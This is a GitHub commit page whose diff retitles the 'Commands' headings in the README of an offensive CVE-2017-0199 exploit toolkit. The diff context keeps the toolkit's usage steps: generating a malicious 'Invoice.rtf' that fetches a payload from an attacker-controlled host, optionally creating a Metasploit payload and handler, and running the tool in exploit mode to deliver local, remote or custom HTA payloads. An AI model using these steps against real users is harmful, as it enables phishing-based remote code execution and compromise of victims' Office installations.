Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
bhdresh authored Apr 29, 2017
1 parent 011521c commit f09eced
Showing 1 changed file with 3 additions and 3 deletions.
6 changes: 3 additions & 3 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -29,7 +29,7 @@ Working on following feature


### Scenario 1: Deliver local payload
###### Commands
###### Example commands
1) Generate malicious RTF file
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler
Expand All @@ -43,7 +43,7 @@ Working on following feature


### Scenario 2: Deliver Remote payload
###### Commands
###### Example commands
1) Generate malicious RTF file
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) Start toolkit in exploit mode to deliver remote payload
Expand All @@ -54,7 +54,7 @@ Working on following feature


### Scenario 3: Deliver custom HTA file
###### Commands
###### Example commands
1) Generate malicious RTF file
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) Start toolkit in exploit mode to deliver custom HTA file
Expand Down

0 comments on commit f09eced

Please sign in to comment.